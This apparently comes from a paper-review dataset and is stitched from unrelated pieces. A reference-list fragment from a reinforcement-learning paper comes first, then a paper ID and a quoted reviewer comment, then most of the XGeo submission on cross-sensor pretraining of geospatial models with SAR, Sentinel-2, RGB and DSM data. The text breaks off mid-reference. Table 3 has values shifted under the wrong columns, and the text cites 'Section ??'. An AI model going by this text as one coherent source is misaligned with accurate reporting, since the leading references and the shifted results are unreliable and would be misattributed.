Infinite-horizon model predictive control for periodic tasks with contacts. *Robotics: Science and systems VII*, pp. 73, 2012. Benjamin Eysenbach, Abhishek Gupta, Julian Ibarz, and Sergey Levine. Diversity is all you need: Learning skills without a reward function. In *International Conference on Learning Representations*, 2019. Claude-Nicolas Fiechter. Efficient reinforcement learning. In *Proceedings of the seventh annual conference on Computational learning theory*, pp. 88–97, 1994. Justin Fu, Aviral Kumar, Ofir Nachum, George Tucker, and Sergey Levine. D4rl: Datasets for deep data-driven reinforcement learning. *arXiv preprint arXiv:2004.07219*, 2020. Scott Fujimoto, David Meger, and Doina Precup. Off-policy deep reinforcement learning without exploration. In *International conference on machine learning*, pp. 2052–2062. PMLR, 2019. Arthur Gretton, Karsten M Borgwardt, Malte J Rasch, Bernhard Schölkopf, and Alexander Smola. A kernel two-sample test. *The Journal of Machine Learning Research*, 13(1):723–773, 2012. Tuomas Haarnoja, Aurick Zhou, Pieter Abbeel, and Sergey Levine. Soft actor-critic: Off-policy maximum entropy deep reinforcement learning with a stochastic actor. In *International conference on machine learning*, pp. 1861–1870. PMLR, 2018. Elad Hazan, Sham Kakade, Karan Singh, and Abby Van Soest. Provably efficient maximum entropy exploration. In *International Conference on Machine Learning*, pp. 2681–2691. PMLR, 2019. Roger A Horn and Charles R Johnson. *Matrix analysis*. Cambridge university press, 2012. Chi Jin, Akshay Krishnamurthy, Max Simchowitz, and Tiancheng Yu. Reward-free exploration for reinforcement learning. In *International Conference on Machine Learning*, pp. 4870–4879. PMLR, 2020. Kittipat Kampa, Erion Hasanbelliu, and Jose C Principe. Closed-form cauchy-schwarz pdf divergence for mixture of gaussians. In *The 2011 International Joint Conference on Neural Networks*, pp. 2578–2585. IEEE, 2011. Diederik P Kingma and Max Welling. Auto-encoding variational bayes. In *International conference on learning representations*, 2014. Aviral Kumar, Aurick Zhou, George Tucker, and Sergey Levine. Conservative q-learning for offline reinforcement learning. *Advances in Neural Information Processing Systems*, 33:1179–1191, 2020. Douglas Bruce Lenat. *AM: an artificial intelligence approach to discovery in mathematics as heuristic search*. Stanford University, 1976.
qWSk62REeK
> XGeoSet, encompassing over 2 million images. You should state the size of the images (on average if they are heterogeneous). 2 million 1024x1024 images is a lot different than 2 million 128x128 images.
MULTISENSORY GEOSPATIAL MODELS VIA CROSS-SENSOR PRETRAINING Anonymous authors Paper under double-blind review ABSTRACT Geospatial remote sensors, derived from optical and microwave sensors, exhibit significant diversity and provide unique capabilities due to the different observing mechanisms. By integrating multi-sensor data through fusion, researchers can harness the complementary and synergistic nature of optical and microwave data to achieve more accurate and efficient Earth monitoring. Despite the proven enhancements by geospatial pretraining models on various downstream tasks, most research primarily focuses on single sensor modality. Thus, to unlock these synergies, we introduce a multi-sensor geospatial pretraining model, XGeo, pretrained with four sensor modalities: RGB channels, Sentinel-2, Synthetic Aperture Radar (SAR), and Digital Surface Model (DSM) data, encompassing a total of two million multi-sensor images. Our method is equipped to manage both paired and unpaired data effectively. When originating from the same geolocation, we integrate cross-linked corresponding sensors into the modeling of the masked image, which facilitates the learning of a joint representation from multiple sensors. In addition, we utilize a mixture of expert layers and heterogeneous batches to mitigate data heterogeneity. Our experiments show that XGeo enhances performance on both single sensor and multisensor downstream tasks, such as land-use classification, segmentation, cloud removal, and pan-sharpening. We also reveal that representations from natural images differ from some of geospatial remote sensors, which renders the use of existing representations less effective. Our work serves as a comprehensive guide for developing robust multisensor geospatial pretraining models, paving the way for more advanced geospatial capabilities. 1 INTRODUCTION Geospatial remote sensors exhibit considerable diversity (Figure 1), with reported spatial (Qiu et al., 2013) and feature heterogeneity (Vanderhoof et al., 2023; Xu et al., 2022a). Two principal categories emerge based on their imaging mechanisms: optical sensors (e.g., Sentinel-2 (Drusch et al., 2012) and LiDAR) and microwave sensors (e.g., Synthetic-aperture radar (Formaro & Pascazio, 2014)). These sensors vary significantly in their observation methods and capabilities. Optical remote sensing captures reflected and absorbed electromagnetic radiation in the visible and near-infrared spectrum, yielding high-resolution imagery and surface property information. Conversely, microwave remote sensing operates at longer wavelengths, penetrating clouds and vegetation to reveal subsurface features and structural properties (Musa et al., 2015) (Figure 1). A multi-sensor fusion approach combines the strengths of both optical and microwave remote sensing, offering a more comprehensive and accurate understanding of the Earth’s surface (Schmitt et al., 2017). By integrating data from multiple sensors, researchers can leverage the complementary nature of optical and microwave data to overcome limitations and obtain a more complete picture. For instance, combining optical and microwave data can help estimate soil moisture content, which is crucial for ecosystem management (Jung et al., 2017; Gottfriedsen et al., 2021). Multi-sensor fusion also enhances the accuracy of topographic mapping by incorporating both surface features captured by optical sensors and elevation information derived from microwave sensors. Numerous multisensor fusion deep learning models have been proposed for individual tasks, such as cloud removal (Xu et al., 2022b; He et al., 2021b), biomass estimation (Ghosh & Behera, 2018) and landcover segmentation (Cha et al., 2021; Hu et al., 2023). These studies substantiate the enhancement in performance achievable by geospatial models incorporating multisensor modalities. Figure 1: Examples of four sensor modalities: SAR, Sentinel 2, RGB, DSM. Here, each pair of {SAR & Sentinel-2} and {RGB & DSM} are colocated on the same geolocation respectively. In the example of Sentinel-2, only blue, green, red bands are shown for the convenience of visualization. Despite these important synergies, most of geospatial pretrained models focus predominantly on a single modality (Mendieta et al., 2023; Wang et al., 2022a; Cong et al., 2022; Mañas et al., 2021; Sun et al., 2022). While studies like Liu et al. (2022a), Chen & Bruzzone (2022) and Scheibenreit et al. (2022) employ Sentinel-2 and SAR for pretraining via contrastive learning, these methodologies are inherently limited by the need to paired sensor modalities. This limitation restricts the efficient utilization of the abundant unpaired sensor modalities that are prevalently available in real-world scenarios. By establishing a multisensor pre-trained model scalable to both paired and unpaired sensors, a unified framework for analyzing multisensor remote sensing data can be provided. Such a model can be fine-tuned or used as a feature extractor to interpret multisensor data effectively. Therefore, our paper develops a novel multi-sensor geospatial pretraining model that can potentially be scalable to many sensor modalities, paired or not. To our best knowledge, it is the first multi-sensor geospatial pretraining of such kind. Additionally, our paper seeks to address several unexplored questions in the realm of multisensor geospatial models. A natural inquiry arises: How can joint representations between corresponding sensors be learned by employing masked image modeling techniques? In geospatial tasks within the RGB domain, it is typical to leverage pre-trained backbones on ImageNet (Risojevic & Stojnic, 2021; Wang et al., 2022b) or to utilize features distilled from such models (Mendieta et al., 2023). Given this, we inquire, Does leveraging or distilling features from established vision models enhance multisensor geospatial pretraining? Lastly, a practical concern emerges: How can multisensor heterogeneity be mitigated during pretraining? In this paper, we aim to address the aforementioned questions and provide insights into effectively pretraining multisensor geospatial models. Our contributions can be summarized as follows: • We introduce a novel cross-sensor paradigm, XGeo, for joint representation learning. This paradigm harmonizes diverse representations and empowers multisensor models to effectively discern the complex relationships between corresponding sensors. • We unveil a high-performing pretrained model, cultivated from a comprehensive multisensor dataset, XGeoSet, encompassing over 2 million images. This model adeptly amalgamates four sensor modalities: RGB images, multispectral images, SAR, and DSM, demonstrating superior performance across several multisensor downstream tasks. • Furthermore, we have made discoveries, yet to be reported, that several methods can augment the model’s performance: (1) The incorporation of MoE and heterogeneous batching effectively harmonizes diverse representations from optical and microwave sensor types; (2) Initiating pretraining from scratch has been observed to yield superior results compared to leveraging existing foundational models. 2 RELATED WORK Geospatial pretraining. As pretrained models continue to revolutionize the fields of vision and natural language processing, their potential in the geospatial sphere is becoming increasingly evident. These models have demonstrated remarkable prowess in enhancing the efficacy of deep learning models when applied to downstream tasks (Neumann et al., 2019; Mañas et al., 2021; Cong et al., 2022; Ayush et al., 2020; Mendieta et al., 2023). The geospatial domain has seen the emergence of two main approaches for self-supervised pretraining paradigms. The first centers around the use of contrastive learning (Mañas et al., 2021; Ayush et al., 2020; Liu et al., 2022a). In this technique, the loss function is crafted to incentivize the model to draw similar or positive pairs closer together in the embedding space while pushing dissimilar or negative pairs further apart (Chen et al., 2020). However, identifying appropriate augmentations for contrastive methods presents a significant challenge. Certain augmentations in geospatial images, which significantly alter the image’s intensity, can lead to undesirable outcomes (Neumann et al., 2019). Various implementations of pretraining with contrastive learning incorporate temporal and spectral augmentation (Mañas et al., 2021), while others apply a colorization objective (Vincenzi et al., 2020). Although works such as Liu et al. (2022a), Chen & Bruzzone (2022) and Scheibenreif et al. (2022) treat colocalized Sentinel-2 and SAR as positive pairs, these approaches are restricted to these two or more pairing sensor modalities and doesn’t efficiently leverage the wide range of unpaired sensor modalities. Given these augmentation constraints (Neumann et al., 2019), alternative methods have been developed, employing Masked Image Modeling (MIM) (Cong et al., 2022; Mendieta et al., 2023; Sun et al., 2022), relying on simple spatial augmentations such as flipping and cropping. MIM not only requires less stringent augmentations but also outperforms its contrastive learning counterparts (Mendieta et al., 2023; Cong et al., 2022; Sun et al., 2022). However, most prior studies focus on remote sensing imagery in the visible spectrum or employ a single sensor modality (Mendieta et al., 2023; Wang et al., 2022a; Cong et al., 2022; Mañas et al., 2021). Alternatively, they are confined to two or more paired sensors due to the inherent limitations of contrastive learning (Liu et al., 2022a; Chen & Bruzzone, 2022; Scheibenreif et al., 2022). In this work, we develop our pretraining objective based on a masked image modeling approach, akin to (Xie et al., 2021; He et al., 2021a). We demonstrate that our model can be pretrained with four sensor modalities, taking advantage of the unpaired sensor. Multi-source learning in language and vision communities. Multi-source learning is a prevalent strategy when handling multi-modal tasks (Shen et al., 2023; Zhu et al., 2022) or multitask challenges in both the language and vision domains (Chen et al., 2022; Aoki et al., 2022; Liang et al., 2022; Aghajanyan et al., 2021; Lample & Conneau, 2019; Conneau et al., 2020; Bachmann et al., 2022). This technique exploits data from diverse sources to bolster the learning process and enhance model performance. A notable example is multilingual pretrained models, such as XLM (Lample & Conneau, 2019) and its derivatives (Conneau et al., 2020; Chi et al., 2022). These models utilize multilingual datasets, pretraining them on a large scale to generate unsupervised cross-lingual representations (Conneau et al., 2020; Lample & Conneau, 2019). This approach enables the models to develop a unified representation across multiple languages, thereby enhancing their performance on cross-lingual tasks. Furthermore, the batching strategy has been identified as an essential aspect of creating generalizable representations and preventing collapse in multilingual models (Aghajanyan et al., 2021, 2020). Simultaneously, the Mixture-of-Experts (MoE) strategy (Shazeer et al., 2017) has been utilized to enhance multi-source learning in both multitask learning (Chen et al., 2022; Aoki et al., 2022; Liang et al., 2022) and language-vision pretraining (Shen et al., 2023; Zhu et al., 2022). In the specific context of multisensor geospatial pretraining, heterogeneity can originate from the use of different sensor types (e.g., optical, microwave) or different platforms (e.g., various satellites). Properly addressing this heterogeneity is crucial as it can significantly influence the performance of the pretraining model (Aghajanyan et al., 2021). To meet this challenge, we draw inspiration from works in computer vision (Riquelme et al., 2021) and natural language processing (Aghajanyan et al., 2021; Lample & Conneau, 2019). We incorporate techniques such as cross-sensor representation learning into our XGeo. 3 CROSS-SENSOR GEOSPATIAL PRETRAINING In this section, we present the multisensor pretraining paradigm. Following (Mendieta et al., 2023), we employ SIMMIM (Xie et al., 2021) using a Swin Transformer (Liu et al., 2021, 2022b) as a backbone. Figure 2 presents an overview of the cross-sensor geospatial pretraining methodology. 3.1 INPUT REPRESENTATION Distinct embedding layers for each sensor. We consider $N$ sensor modalities, with each sensor having a corresponding number of channels, denoted as $\{C_i\}_{i=1...N}$. Taking into account the unique number of channels associated with each sensor (some examples shown in Table 1), we utilize individual patch embeddings tailored to each specific sensor. This approach allows the model to efficiently process and learn from the distinct characteristics of various sensor modalities. Figure 2: Overview diagram of XGeo. Each sensor is fed through a separate patch embedding layers (Section 3.1), and through the same encoder. During the reconstruction, separate decoders are used. If the sensors are paired, there’s a chance that our model will reconstruct the corresponding paired sensor instead itself (Section 3.2). Other best practice can be found at Section 3.4. To elaborate, for the image from the $i$-th sensor, $\mathbf{I} \in \mathbb{R}^{W \times H \times C_i}$, we first divide it into square patches of size $P$, resulting in $\mathbf{T}_i \in \mathbb{R}^{L \times P^2 \times C_i}$. Here, $W$ and $H$ represent the width and height of the images, while $L$ denotes the number of patches. We then apply corresponding linear embedding layers, $\{f_i\}_{i=1...N}: \mathbb{R}^{L \times P^2 \times C_i} \rightarrow \mathbb{R}^{L \times C_e}$, to the patches $\mathbf{T}_i$, projecting them to an embedding space with the dimension of $C_e$. The function $f_i$ represents the embedding layer for images from the $i$-th sensor. In our work, $C_e$ is the same for all sensors. Intuitively, to address the channel heterogeneity among various sensor modalities, each sensor modality will pass through a separate trainable embedding layer to unify the representation dimension before being fed into the shared encoder. ### 3.2 Cross-sensor Pretraining **Shared encoder for all sensor modalities.** The patches obtained from $\{f_i\}_{i=1...N}, \mathbf{T}_i \in \mathbb{R}^{L \times C_e}$, will then be masked and fed through the encoder. The masking strategy employed in our approach are the same as those used in [Xie et al., 2021]. By having separate patch embedding layers ($f_i$) for each sensor, the model can learn the unique characteristics of each sensor modality. The learned embeddings from all sensors are then integrated through the same encoder, enabling the model to effectively learn joint representations and handle multisensor geospatial data. **Separate decoder for each sensors and cross sensor prediction.** Collecting data from different sensors for the same geo-location is a common practice in the geospatial domain. Learning joint representations of such multisensor data can prove beneficial for various downstream tasks. Although contrastive learning has demonstrated promise in learning effective representations, its performance may be limited due to the lack of suitable data augmentations for remote sensing images. To address this issue, we propose employing cross-sensor strategies in the context of MIM to learn joint representations for multisensor geospatial data. For instance, when the model is fed with masked images from DSM, it can predict the masked patches of itself or the corresponding images from RGB. An example pair of DSM and RGB images is shown in Figure 1 in the two panels on the right. This encourages the model to align the different sensor representations. Accordingly, our model incorporates different decoders for each sensor. Specifically, if there exists a pair of images from the $i$-th sensor and $j$-th sensor, $\{I_i \in \mathbb{R}^{W \times H \times C_i}, I_j \in \mathbb{R}^{W \times H \times C_j}\}$, the model processes the masked image as follows: $$I'_i = D_i(En(f_i(I_i))) \text{ or } I'_j = D_j(En(f_j(I_j)))$$ and $$I'_j = D_j(En(f_j(I_j))) \text{ or } I'_i = D_i(En(f_i(I_i)))$$ where $En : \mathbb{R}^{W \times H \times C_i} \rightarrow \mathbb{R}^{L \times C_m}$ is the shared encoder, and $C_m$ is the embedding dimension of the final layer in the encoder. $I'_i$ and $I'_j$ are the predicted $i$-th and $j$-th sensor images respectively. $D_i : \mathbb{R}^{L \times C_m} \rightarrow \mathbb{R}^{W \times H \times C_i}$ is the decoder to reconstruct the $i$-th sensor image. Equation (1) shows that the predicted output of the pretraining model will either reconstruct itself or its paired sensor images. If there’s no paired sensor in the pretraining dataset, it will construct itself in the conventional way: $$I'_i = D_i(En(f_i(I_i)))$$ This approach capitalizes on the inherent relationship between different sensors observing the same location, enabling the model to capture complementary information. Furthermore, it provides flexibility in handling scenarios where no paired sensors are available, allowing for enhanced adaptability in choosing the pretraining dataset. This is particularly advantageous given that multimodal geospatial datasets are less prevalent than single-sensor dataset. ### 3.3 Pretraining data. Table 1: Breakdown of datasets of our pretraining data. We gather approximately 2M samples from a combination of labeled and unlabeled satellite imagery with various ground sample distances and sensor modalities. | Dataset | # Images | GSD | Sensor modality | # Channels | paired sensors? | |-------------|----------|-----------|--------------------------|------------|-----------------| | GeoPile | 600K | 0.1m - 30m| RGB$^a$ | 3 | ✗ | | MillionAID | 1M | 0.5 - 153m| RGB$^a$ | 3 | ✗ | | SEN12MS | 320K | 10m | SAR / sentinel-2 | 2/14 | ✓ | | MDAS | 40K | 0.1m - 10m| DSM/ RGB$^b$ | 1/3 | ✓ | $^a$ is not sourced from a single sensor; instead, it amalgamates sensor images from an array of satellites, including NAIP, GeoEye, WorldView, QuickBird, IKONOS, and SPOT satellites, among others. $^b$ is derived from airborne sources ([Hu et al., 2023](#)). For more in-depth details regarding the RGB, please refer to Appendix A.2. Our multisensor pretraining data, XGeoSet, is composed of four sensor modalities, amassed to a total of 2 million images through the inclusion of additional geospatial data. The detailed composition of XGeoSet is presented in Table 1. Specifically, XGeoSet incorporates SEN12MS ([Schmitt et al., 2019](#)), a dataset enriched with paired SAR and Sentinel-2 satellite images from all meteorological seasons, to augment data diversity. All sensors in this dataset are ortho-rectified ([Schmitt et al., 2019](#)). Additionally, we have integrated DSM and RGB images from the MDAS dataset ([Hu et al., 2023](#)), resized to a dimension of 384. It is noteworthy that, although the Sentinel-2 modality does encompass RGB channels in terms of imaging band, this RGB modality is distinguished and separated due to its expansive dataset that extends beyond the Sentinel-2 sensor, exhibiting varied Ground Sample Distances (GSD) and high feature entropy. Those two attributes that have been validated as impactful during pretraining ([Mendieta et al., 2023](#), [Cong et al., 2022](#)). The exclusion of the RGB modality from our pretraining dataset results in a decrease in efficacy compared to datasets where it is included (Appendix A.2). The enhanced version of XGeoSet with RGB (GeoPile ([Mendieta et al., 2023](#)) and MillionAID ([Long et al., 2021](#))) demonstrates elevated performance in the 7 downstream tasks outlined in GFM ([Mendieta et al., 2023](#)) under identical settings (Refer to Appendix A.1). To optimize XGeoSet-RGB, experimentation with diverse datasets was undertaken (See Appendix A.1). 3.4 Best Practice in Pretraining MoE for multisensor learning A shared encoder can present challenges when it comes to efficiently learning each sensor’s representation. To tackle this issue, we propose integrating the sparsely gated Mixture of Experts (MoE) approach (Shazeer et al., 2017) to replace MLP layers within the encoder. Our pretraining loss function, $L$, combines L1 loss (Xie et al., 2021; He et al., 2021a) for reconstruction (i.e., MIM loss) and auxiliary losses (Hwang et al., 2022; Riquelme et al., 2021): $$L = L_{\text{MIM}} + \lambda L_{\text{auxiliary}},$$ where $\lambda$ represents the weight for auxiliary losses. In practice, we use $\lambda = 0.01$. Pretraining Method. We utilize heterogeneous batches during the pretraining process, a method initially introduced by Muppet (Aghajanyan et al., 2021). This method is typically employed in multitask learning scenarios, aimed at creating a consolidated representation across diverse tasks during model training, notwithstanding their differing learning objectives. Our findings suggest that this method can also be effectively applied to multisensor geospatial pretraining (Section ??). In each batch, all sensor data are loaded in sequence, ensuring that the optimization of our model encompasses all tasks (Aghajanyan et al., 2021). To elaborate, each batch can be depicted as a set: $$\{I \in \mathbb{R}^{W \times H \times C_t}\}_{t=1...N}.$$ Moreover, in light of the distinct imaging mechanisms inherent to these sensors, we opt to perform pretraining from scratch (Section 4.3). 4 Experiments Experimental Settings. All of our experiments are conducted using a SwinV2-base architecture (Liu et al., 2022b) with a patch size of 16×16 pixels and 8 experts. The models are pre-trained for either 100 epochs for ablation studies or 800 epochs to achieve optimal results and maintain comparability with state-of-the-art methods. When specified, 1% BEN and 1% SEN12MS-CR are also employed for ablation studies. We utilize 8 NVIDIA V100 GPUs with a batch size of 2048 (128 per GPU) and an image size of 192×192. All pretraining settings follow the configurations described in (Mendieta et al., 2023). Detailed pretraining settings and pretraining reconstruction visualization can be found at Appendix B.1 and Appendix B.2 respectively. Downstream Evaluation. Upon completion of the pretraining, we fine-tune and assess the model on a diverse range of downstream multisensor datasets. This aims to provide a comprehensive understanding of the model’s performance potential across various tasks (refer to Section 4.1 for task details). Table 2 provides an overview of the downstream evaluation tasks, together with their respective sensor modalities. Among these tasks, the use of multisensor data can enhance the performance of land classification and segmentation. Meanwhile, cloud removal is inherently dependent on multisensor modalities and cannot be effectively tackled without them. Although pansharpening requires one optical sensor, it relies heavily on multi-spectral images. Detailed settings in those downstream tasks can be found in Appendix C.2. Table 2: Downstream tasks. It covers various use cases in geospatial domain, with a range of ground sample distances and sensor modalities. | Dataset | # Application | GSD | Sensor modality | # Channels | |------------------|---------------------|---------|-----------------------|------------| | Big Earth Net | Scenes classification| 10m - 60m| SAR / Sentinel-2 | 2/14 | | Vaihingen | Land segmentation | 0.09m | DSM / RGB | 1/3 | | SEN12MS-CR | cloud removal | 10 - 60m| SAR / Sentinel-2 | 2/14 | | SpaceNet | Pan-sharpening | 0.1m - 10m| WorldView 3 | 8 | 4.1 Geospatial downstream evaluation Scene classification. One prevalent remote sensing application is classification. We evaluate our pretraining model on BigEarthNet (BEN) (Sumbul et al., 2019), a dataset extensively used in other literature (Mañas et al., 2021; Cong et al., 2022; Chen et al., 2020; Wanyan et al., 2023; Mendieta et al., 2023). BEN (Sumbul et al., 2019) is a large-scale remote sensing dataset specifically designed for multi-label classification tasks. The data includes pairs of 12-band Sentinel-2 images along with their corresponding 2-band SAR images. We employ the data split and 19-class evaluation, as is Table 3: Quantitative results of all the downstream tasks (Table 2) from XGeo (ours) compared to other pretrained models. Results are replicated from the previous reports. | Methods | 10% BEN mAP (↑) | 100% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SAM (↓) | SSIM (↑) | PNSR (↑) | SSIM (↑) | Vaihingen mIOU (↑) | |---------------|-----------------|------------------|--------------------|---------|----------|----------|----------|-------------------| | SeCo | 82.6 | 87.8 | - | - | - | - | - | 68.9 | | SatMAE | 82.1 | - | - | - | 22.742 | 0.621 | 70.6 | | | MoCoV2 | - | 89.3 | - | - | - | - | - | | | DINO-MC | - | 84.2 | - | - | - | - | - | | | GFM | 86.3 | - | - | - | 22.599 | 0.638 | 75.2 | | | Rammon | 82.6 | 86.2 | 0.048 | 14.78 | 0.572 | 21.825 | 0.594 | 67.0 | | IN-22k | 85.7 | 89.5 | - | - | 21.655 | 0.612 | 74.7 | | | XGeo | 87.5 | 92.9 | 0.026 | 4.87 | 0.842 | 22.850 | 0.668 | 75.8 | standard in the literature (Neumann et al., 2019; Mañas et al., 2021; Cong et al., 2022; Mendieta et al., 2023). In Table 3 we report the mean average precision (mAP) results on BEN for all methods. Our model can provide robust performance against other pretraining methods (Mañas et al., 2021; Cong et al., 2022; Chen et al., 2020; Wanyan et al., 2023; Mendieta et al., 2023; Liu et al., 2022b), including ImageNet-22k (Liu et al., 2022b). We note that those competing methods use different backbones. Their results of corresponding random initialization and ImageNet initialization can be found in previous studies (Mendieta et al., 2023; Cong et al., 2022). Furthermore, one key motivation for training a geospatial foundation model is to improve the sample efficiency for downstream tasks. Notably, we find that our model maintains strong performance on BEN, even when only given 1% of the training data (Appendix C.3). Cloud removal The majority of optical observations acquired via spaceborne Earth imagery are affected by clouds, presenting challenges in reconstructing cloud-covered information in previous studies. While optical imagery is impacted by adverse weather conditions and lack of daylight, SAR sensors are not affected, providing a valuable source of complementary information. Consequently, performing cloud removal tasks without SAR data can significantly degrade task performance (Xu et al., 2022b). We evaluate our model on SEN12MS-CR (Ebel et al., 2020). Table 4 shows promising results in Spectral Angle Mapper (SAM) and Mean Absolute Error (MAE), outperforming existing cloud removal models (Grohnfeldt et al., 2018; Meraner et al., 2020; Xu et al., 2022b). Qualitative results are presented at Appendix C.5. Meanwhile, the structural similarity index measure (SSIM) metric demonstrates comparable results with those methods. Our multisensor pretraining approach, which incorporates SAR data, enables effective cloud removal, while other geospatial pretraining models that rely solely on optical data do not demonstrate their capabilities in cloud removal (Table 5). Pan-sharpening and Segmentation. We extended our evaluation to include tests on pan-sharpening and segmentation. The results presented in Table 5 demonstrate that XGeo surpasses other models in performance. A more comprehensive discussion on these evaluations can be found in Appendix C.4. 4.2 Comparison with single sensor pretraining. To underscore the pivotal role of multiple sensor modalities in pretraining, we compare our multisensor pretraining approach using XGeoSet with models pretrained on only one sensor modality (i.e., either SAR or Sentinel-2) from SEN12MS (Schmitt et al., 2019). We assess the performance of these models on the BEN (Sumbul et al., 2019) and SEN12MS-CR (Ebel et al., 2020), employing both sensors individually and in combination. Figure 3 highlights two advantages of our model: (1) The multisensor pretraining model consistently outperforms models pretrained with a single sensor modality, as indicated by superior performance across all columns when the sensor modality is fixed. (2) Using both sensors for tasks like land use classification and cloud removal leads to enhanced performance, demonstrated by higher accuracy across all rows when the pretraining data is fixed. The second advantage can be credited to the complementary data offered by both sensors. For instance, SAR images provide crucial information for identifying water bodies and urban structures, as they capture the radar backscatter properties of the Earth’s surface. This unique data, when paired with spectral information from Sentinel-2 images, improves classification performance. Moreover, SAR’s ability to penetrate clouds significantly contributes to more effective cloud removal results (Xu et al., 2022b). Notably, when evaluating the BEN dataset with only the Sentinel-2 modality, our method still achieves a better result than other pretraining methods (86.8%). It rules out the possibility that the improvement of XGeo is only because of sensor modality increase in the downstream tasks. 4.3 PRETRAINING FROM SCRATCH PERFORMS BETTER. Table 5: Distillation from other pretraining model vs pretraining from scratch | Methods | 1% BEN mAP (↑) | 10% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SAM (↓) | SSIM (↑) | PSNR (↑) | SSIM (↑) | mIOU (↑) | |--------------------------------|----------------|-----------------|--------------------|---------|----------|----------|----------|----------| | Distilled from ImageNet22k | 79.4 | 86.4 | 0.035 | 6.42 | 0.726 | 22.107 | 0.621 | 72.9 | | Distilled from CLIP | 76.6 | 83.8 | 0.051 | 8.96 | 0.707 | 22.559 | 0.674 | 69.3 | | Reconstruct CLIP (EVA) | 73.5 | 80.6 | 0.053 | 9.96 | 0.689 | 21.778 | 0.591 | 65.7 | | From scratch | 80.9 | 87.2 | 0.026 | 5.04 | 0.821 | 22.742 | 0.677 | 74.8 | The effectiveness of using existing vision pretrained models for multisensor geospatial pretraining is evaluated. Intermediate features are extracted (Mendieta et al., 2023) and compared to embeddings from ImageNet-22k. A similar experiment is conducted with the CLIP model (Radford et al., 2021), recognized for its potent multimodal representation learning capabilities. Distillation from ImageNet-22k outperforms that from CLIP (Radford et al., 2021). The EVA method (Fang et al., 2022), which reconstructs the CLIP features of masked patches instead of the patches themselves, is also examined. Despite its proven advantage over traditional MIM like MAE (He et al., 2021a), it surprisingly underperforms in our downstream evaluation compared to other methods, suggesting a larger domain gap for CLIP features (Radford et al., 2021) when applied to multisensor geospatial data. On the contrary, optimal accuracy for multisensor geospatial pretraining is achieved when a model is trained from scratch. The subpar performance of distillation is credited to the pronounced domain gap between natural images and geospatial-specific sensors. Moreover, distillation has an inherent limitation, as it bounds the student model’s performance to align with that of the teacher model (Mendieta et al., 2023). This significant domain gap can be attributed to the fundamental disparities in the physical mechanisms of optical and microwave remote sensing: While optical remote sensing hinges on the reflection and absorption of electromagnetic radiation, microwave remote sensing is governed by scattering, penetration, and dipole-interference of microwaves (Fornaro & Pascazio, 2014). Given that natural images are predominantly underpinned by optical sensors, this results in a substantial domain discrepancy. Accordingly, for fine-tuning a model for multisensor geospatial tasks, it’s advisable to use pretrained weights derived from multisensor data for optimal performance. This finding underscores the need for robust foundation models specific to the geospatial domain, capable of handling diverse sensor data and enhancing performance on multisensor downstream tasks. 4.4 ABLATION STUDIES Table 6: Quantitative results of XGeo, when using dataset homogenous and batch heterogeneous approaches. | Methods | 1% BEN mAP (↑) | 10% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SEN12MS-CR SAM (↓) | SSIM (↑) | PSNR (↑) | SSIM (↑) | mIOU (↑) | |--------------------------|----------------|-----------------|--------------------|--------------------|----------|----------|----------|----------| | Dataset homogenous | 77.2 | 84.4 | 0.035 | 10.4 | 0.703 | 19.234 | 0.589 | 72.3 | | Batch Heterogeneous | 80.8 | 87.2 | 0.026 | 5.04 | 0.821 | 22.742 | 0.677 | 74.8 | (Aghajanyan et al., 2021) Table 7: Quantitative results of XGeo, with and without MoE/cross sensor reconstruction. | Pretraining strategies MoE cross-sensor | Cross sensor percentage | 1% BEN mAP (↑) | 10% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SEN12MS-CR SAM (↓) | SSIM (↑) | PSNR (↑) | SSIM (↑) | mIOU (↑) | |----------------------------------------|------------------------|----------------|-----------------|--------------------|--------------------|----------|----------|----------|----------| | ❌ ❌ | 0% | 78.3 | 86.2 | 0.038 | 8.19 | 0.735 | 22.333 | 0.589 | 72.8 | | ✔ ❌ | 0% | 78.5 | 86.2 | 0.026 | 5.11 | 0.767 | 22.528 | 0.637 | 73.4 | | ❌ ✔ | 50% | 80.7 | 86.9 | 0.036 | 8.67 | 0.753 | 22.518 | 0.611 | 73.6 | | ✔ ✔ | 100% | 80.5 | 86.8 | 0.026 | 4.96 | 0.789 | 22.634 | 0.649 | 74.4 | | ✔ ✔ | 50% | 80.9 | 87.5 | 0.026 | 5.04 | 0.821 | 22.742 | 0.677 | 74.8 | Heterogeneous Batching. Another critical factor in achieving successful multi-sensor pretraining and learning generalizable representations is the selection of batches. Inspired by multitasking learning (Aghajanyan et al., 2021), we experimented with two balancing schemes: dataset homogenous and batch heterogeneous (Aghajanyan et al., 2021). As the result shown in Table 6, heterogeneous batching shows a superior performance than dataset homogenous. It demonstrates that heterogeneous batching not only works in the multitasking prefinetuning, but also significantly impacts the performance and generalizability of a multi-sensor pretrained model. MoE and cross sensor pretraining. In the proposed XGeo model, we incorporate both cross-sensor pretraining paradigms and the Mixture of Experts (MoE). In an ablation study, we present the results when either MoE or cross-sensor pretraining is omitted. As shown in Table 7, removing MoE from the model results in similar performance on the BEN dataset, while other tasks see a more substantial decrease. This uneven response across different tasks aligns with observations made in several previous multi-modal studies (Zhu et al., 2022). On the other hand, removing the cross-sensor paradigm leads to a consistent performance decline across all tasks. It is natural to question how the proportion of sensor crossing affects performance. To explore this, we perform an ablation study on the percentage of sensors subject to cross-reconstruction. Our results suggest that a sensor crossing rate of 50% provides slightly superior outcomes compared to a rate of 100%. This indicates that the optimal sensor crossing strategy maintains a balance between the benefits of cross-reconstruction and the retention of sensor-specific information, consequently enhancing performance across a diverse range of geospatial tasks. 5 CONCLUSION We present a multisensor pretraining model that incorporates a novel cross-sensor paradigm for joint representation learning, effectively capturing relationships between corresponding sensors. To handle the diverse representation of geospatial data during pretraining, we employ a MoE and heterogeneous batching. Our pretrained model is based on a large-scale multisensor dataset comprising over 2 million images. Our approach demonstrates superior performance across various multisensor downstream tasks. Limitation and future direction of our study can be found in Appendix D. REFERENCES Armen Aghajanyan, Akshat Shrivastava, Anchit Gupta, Naman Goyal, Luke Zettlemoyer, and Sonal Gupta. Better fine-tuning by reducing representational collapse, 2020. Armen Aghajanyan, Anchit Gupta, Akshat Shrivastava, Xilun Chen, Luke Zettlemoyer, and Sonal Gupta. Muppet: Massive multi-task representations with pre-finetuning. In Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pp. 5799–5811, Online and Punta Cana, Dominican Republic, November 2021. Association for Computational Linguistics. doi: 